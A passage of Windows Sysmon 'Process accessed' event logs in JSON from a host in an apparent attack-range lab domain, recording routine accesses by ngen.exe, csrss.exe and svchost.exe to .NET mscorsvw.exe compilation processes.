08:05:28.976","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-00106A7E0C00}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.976\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-00106A7E0C00}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.976","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-00106A7E0C00}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:28.992\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-00106A7E0C00}\r\nTargetProcessId: 4336\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:28.992","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-00106A7E0C00}","TargetProcessId":"4336","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-001048820C00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-001048820C00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-001048820C00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-001048820C00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7211,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-001048820C00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-001048820C00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7212,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.101\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001099230C00}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.101","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001099230C00}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7213,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.101\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001099230C00}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.101","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001099230C00}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7214,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001099230C00}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 